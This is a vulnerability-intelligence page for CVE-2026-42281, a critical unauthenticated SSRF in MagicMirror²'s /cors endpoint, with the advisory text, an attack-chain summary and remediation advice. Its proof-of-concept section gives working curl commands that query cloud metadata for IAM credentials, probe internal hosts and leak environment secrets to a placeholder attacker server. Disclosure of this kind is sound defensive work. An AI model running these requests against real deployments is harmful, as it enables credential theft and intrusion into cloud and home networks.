Skip to main content

MagicMirror CVE-2026-42281

| EUVD-2026-30313 CRITICAL
Server-Side Request Forgery (SSRF) (CWE-918)
2026-05-05 https://github.com/MagicMirrorOrg/MagicMirror GHSA-ph6f-2cvq-79hq
SSRF Microsoft
9.2
CVSS 4.0 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
9.2 CRITICAL
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
X

Lifecycle Timeline

3
CVSS changed
May 14, 2026 - 16:22 NVD
9.2 (CRITICAL)
Source Code Evidence Fetched
May 05, 2026 - 21:32 vuln.today
Analysis Generated
May 05, 2026 - 21:32 vuln.today

DescriptionGitHub Advisory

Summary

An unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the /cors endpoint allows any remote attacker to force the MagicMirror² server to perform arbitrary HTTP requests to internal networks, cloud metadata services, and localhost services. The endpoint also expands environment variable placeholders (VAR_NAME), enabling exfiltration of server-side secrets.

Details

The /cors endpoint in js/server_functions.js (function cors(), lines 37-78) acts as an open HTTP proxy with no authentication and no URL validation. Any user-supplied URL is fetched server-side via fetch() and the full response is returned to the caller.

Additionally, the replaceSecretPlaceholder() function (lines 21-25) expands any VARIABLE_NAME pattern in the URL with the corresponding process.env value before the request is made, allowing an attacker to exfiltrate environment variables (e.g. API keys, tokens, database credentials).

Vulnerable code path:

GET /cors?url=<attacker-controlled-url>
  → replaceSecretPlaceholder(url)     // expands **ENV_VAR** → process.env.ENV_VAR
  → fetch(url)                        // no validation, no blocklist
  → response returned to attacker     // full body, status, headers

Key issues:

  • No authentication required
  • No URL validation or blocklist for private/reserved IP ranges
  • No restriction on URL scheme or destination
  • Environment variable expansion in URL before fetch

PoC

Prerequisites: a running MagicMirror² instance accessible on the network (default: http://<host>:8080).

1. Basic SSRF - access cloud metadata (AWS IMDSv1):

curl "http://<target>:8080/cors?url=http://169.254.169.254/latest/meta-data/"

If the server runs on AWS EC2 without IMDSv2 enforcement, this returns instance metadata including IAM role credentials.

2. Internal network scanning:

curl "http://<target>:8080/cors?url=http://192.168.1.1/"
curl "http://<target>:8080/cors?url=http://127.0.0.1:3000/"

The attacker can probe internal services by observing response status codes and timing.

3. Environment variable exfiltration:

curl "http://<target>:8080/cors?url=http://<attacker-server>/?leak=**SECRET_API_KEY**"

The server expands SECRET_API_KEY to the value of process.env.SECRET_API_KEY before making the request, sending the secret to the attacker-controlled server as a query parameter.

Impact

  • Cloud deployments (AWS/GCP/Azure): full compromise of cloud instance credentials via metadata service (169.254.169.254), potentially leading to lateral movement within the cloud account
  • Internal network access: the server becomes a proxy to scan and interact with services on internal networks that are not directly reachable by the attacker
  • Secret exfiltration: environment variables containing API keys, database credentials, or other sensitive configuration are directly readable
  • Affected users: anyone running MagicMirror² exposed to an untrusted network (including LAN). The /cors endpoint requires no authentication, so any host that can reach the MagicMirror HTTP port can exploit this vulnerability

Articles & Coverage 1

POC CVE-2026-42281: MagicMirror² ≤2.35.0 Unauthenticated SSRF via /cors Endpoint Enables Internal Network Access and Secret Exfiltration May 04, 2026

AnalysisAI

Unauthenticated SSRF in MagicMirror ≤2.35.0 allows remote attackers to proxy arbitrary HTTP requests through the server, accessing cloud metadata services (AWS/GCP/Azure IMDSv1), internal network resources, and localhost services via the unrestricted /cors endpoint. The vulnerability is compounded by environment variable expansion: attackers can exfiltrate server-side secrets (API keys, database credentials) by embedding placeholders like SECRET_API_KEY in URLs, which the server resolves from process.env before making the request. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Network access to port 8080
Delivery
Send GET /cors?url=http://169.254.169.254/latest/meta-data/
Exploit
Server fetches cloud metadata
Execution
Retrieve IAM credentials from response
Persist
Authenticate to AWS API with stolen credentials
Impact
Exfiltrate S3 data or launch malicious instances
Sign in to reveal

Vulnerability AssessmentAI

Exploitation No special conditions-remote unauthenticated exploitation against default configurations of MagicMirror ≤2.35.0. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Real-world risk is HIGH for cloud-hosted and LAN-exposed deployments, despite absence of CVSS score or EPSS data. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker on the same LAN as a home MagicMirror deployment (or scanning the internet for exposed port 8080 instances) sends a crafted HTTP request to exfiltrate AWS credentials. They first probe `http://<target>:8080/cors?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/` to list available IAM roles, then retrieve temporary credentials via `http://<target>:8080/cors?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>`. …
Remediation Upgrade immediately to MagicMirror version 2.36.0 or later (released via https://github.com/MagicMirrorOrg/MagicMirror/releases/tag/v2.36.0), which disables the CORS proxy by default and implements IP blocklisting and DNS rebinding protections when explicitly re-enabled. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 24 hours: Immediately isolate or disable all MagicMirror instances running version 2.35.0 or earlier, or restrict network egress to prevent access to cloud metadata services (169.254.169.254, metadata.google.internal, 169.254.170.2) and internal network ranges. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-42281 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy